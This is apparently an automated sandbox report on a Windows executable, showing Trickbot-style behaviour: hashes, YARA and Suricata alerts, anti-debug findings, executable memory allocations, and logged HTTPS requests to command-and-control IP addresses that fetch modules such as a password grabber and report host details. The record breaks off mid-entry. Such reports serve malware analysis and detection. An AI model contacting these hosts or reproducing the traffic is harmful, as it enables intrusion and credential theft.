Summary | ZeroBOX

linesloters.png

Malicious Library AntiDebug PE File OS Processor Check PE32 AntiVM
Category Machine Started Completed
FILE s1_win7_x6401 Sept. 9, 2021, 9 a.m. Sept. 9, 2021, 9:02 a.m.
Size 364.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 ec330c275ef5bc70e187e7d167b03484
SHA256 3aede78a6c1215c602afa1d2b7ae1ade55446aebc35f346e88694359bf275d78
CRC32 B2075C6A
ssdeep 6144:CC8ByNfLHaa7hrsFVgbtpGVeUQJIjuixao4JSNnSHC0GC:CC8sLzhOVgbtpCxuQJ6S6C0G
PDB Path C:\Users\egypt\Desktop\source\microtable\Release\Tinashe.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
icanhazip.com 104.18.7.156
IP Address Status Action
104.18.7.156 Active Moloch
164.124.101.2 Active Moloch
179.189.229.254 Active Moloch
182.253.210.130 Active Moloch
185.56.175.122 Active Moloch
194.146.249.137 Active Moloch
79.106.115.107 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49203 -> 179.189.229.254:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.101:49207 -> 182.253.210.130:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 179.189.229.254:443 -> 192.168.56.101:49203 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.101:49210 -> 185.56.175.122:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 185.56.175.122:443 -> 192.168.56.101:49210 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 182.253.210.130:443 -> 192.168.56.101:49207 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.101:49204 -> 104.18.7.156:80 2013028 ET POLICY curl User-Agent Outbound Attempted Information Leak
TCP 192.168.56.101:49204 -> 104.18.7.156:80 2017398 ET POLICY IP Check Domain (icanhazip. com in HTTP Host) Attempted Information Leak
TCP 192.168.56.101:49205 -> 179.189.229.254:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 179.189.229.254:443 -> 192.168.56.101:49205 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.101:49211 -> 185.56.175.122:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 185.56.175.122:443 -> 192.168.56.101:49211 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49203
179.189.229.254:443
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd C=AU, ST=Some-State, O=Internet Widgits Pty Ltd b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1
192.168.56.101:49207
182.253.210.130:443
C=US, ST=IL, O=Internet Widgits Pty Ltd C=US, ST=IL, O=Internet Widgits Pty Ltd 92:9c:54:61:4b:3c:f9:b4:92:51:95:d0:aa:d5:6b:b5:51:ab:1d:47
TLSv1
192.168.56.101:49210
185.56.175.122:443
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd C=AU, ST=Some-State, O=Internet Widgits Pty Ltd 50:fd:fd:4e:2c:57:ea:f7:c9:cd:3f:61:4a:a2:40:01:1b:b8:df:02
TLSv1
192.168.56.101:49205
179.189.229.254:443
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd C=AU, ST=Some-State, O=Internet Widgits Pty Ltd b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02
TLSv1
192.168.56.101:49211
185.56.175.122:443
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd C=AU, ST=Some-State, O=Internet Widgits Pty Ltd 50:fd:fd:4e:2c:57:ea:f7:c9:cd:3f:61:4a:a2:40:01:1b:b8:df:02

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
pdb_path C:\Users\egypt\Desktop\source\microtable\Release\Tinashe.pdb
section INIT
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
hook_in_monitor+0x45 lde-0x133 @ 0x744142ea
New_ntdll_LdrGetProcedureAddress+0x43 New_ntdll_LdrLoadDll-0x156 @ 0x7442f7f3
GetProcAddress+0x60 GetModuleHandleA-0x80 kernelbase+0x4190 @ 0x7fefd6d4190
SvchostPushServiceGlobals+0x471 WinHttpQueryOption-0x1a7b winhttp+0x1eb99 @ 0x7fef9f6eb99
SvchostPushServiceGlobals+0x4fb WinHttpQueryOption-0x19f1 winhttp+0x1ec23 @ 0x7fef9f6ec23
WinHttpConnect+0x1ab WinHttpGetDefaultProxyConfiguration-0x1615 winhttp+0x13fe7 @ 0x7fef9f63fe7

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x771d9a5a
registers.r14: 169734778
registers.r15: 24790125
registers.rcx: 0
registers.rsi: 851785792
registers.r10: 0
registers.rbx: 0
registers.rsp: 1632240
registers.r11: 0
registers.r8: 5
registers.r9: 1951127552
registers.rdx: 2
registers.r12: 2411936
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 443
1 0 0

__exception__

stacktrace:
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74436d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77211278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x771d9a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x76e8b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x744205bd
hook_in_monitor+0x45 lde-0x133 @ 0x744142ea
New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x7442fc86
VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefd703096
VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefd7030d6
VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x76e8bbe1
0x9cf3d

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x771d9a5a
registers.r14: 851787120
registers.r15: 1628624
registers.rcx: 2470792156623991849
registers.rsi: 1628208
registers.r10: 0
registers.rbx: 3
registers.rsp: 1627816
registers.r11: 2470792156623991697
registers.r8: 3
registers.r9: 1951132416
registers.rdx: 3
registers.r12: 851782000
registers.rbp: 2470792156623991825
registers.rdi: 40
registers.rax: 4
registers.r13: 0
1 0 0
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/5/file/
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/tHiBidsluI48eG4clGcD6KL/
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/user/test22/0/
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CAnyLiteGamesFXVN%5Clinesloters.exe/0/
suspicious_features Connection to IP address suspicious_request GET https://179.189.229.254/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features Connection to IP address suspicious_request GET https://182.253.210.130/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/5/pwgrabb64/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/5/file/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/3sJT83o5WJMcS5vFWYdczdMViZ/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/user/test22/0/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features Connection to IP address suspicious_request GET https://185.56.175.122/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/10/62/XFNRLHZRPDJ/7/
request GET http://icanhazip.com/
request GET https://179.189.229.254/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/5/file/
request GET https://179.189.229.254/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/tHiBidsluI48eG4clGcD6KL/
request GET https://179.189.229.254/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
request GET https://179.189.229.254/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/user/test22/0/
request GET https://179.189.229.254/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CAnyLiteGamesFXVN%5Clinesloters.exe/0/
request GET https://179.189.229.254/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/NAT%20status/client%20is%20behind%20NAT/0/
request GET https://182.253.210.130/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/5/pwgrabb64/
request GET https://185.56.175.122/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/5/file/
request GET https://185.56.175.122/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/3sJT83o5WJMcS5vFWYdczdMViZ/
request GET https://185.56.175.122/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
request GET https://185.56.175.122/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/user/test22/0/
request GET https://185.56.175.122/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/14/NAT%20status/client%20is%20behind%20NAT/0/
request GET https://185.56.175.122/rob129/TEST22-PC_W617601.99B3C97B5F99BD1F3B34A1F586177F69/10/62/XFNRLHZRPDJ/7/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 668
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001bc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
domain icanhazip.com
cmdline C:\Windows\system32\svchost.exe
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 622592
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x0000000180001000
process_handle: 0x0000000000000408
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
section {u'size_of_data': u'0x00050400', u'virtual_address': u'0x0000d000', u'entropy': 7.3471992121202385, u'name': u'.rsrc', u'virtual_size': u'0x00050390'} entropy 7.34719921212 description A section with a high entropy has been found
entropy 0.883081155433 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2312
process_handle: 0x0000000000000420
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2312
process_handle: 0x0000000000000420
1 0 0
host 179.189.229.254
host 182.253.210.130
host 185.56.175.122
host 194.146.249.137
host 79.106.115.107
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000090000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000000a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 790528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000180000000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000408
1 0 0

NtAllocateVirtualMemory

process_identifier: 752
region_size: 4096
stack_dep_bypass: 0
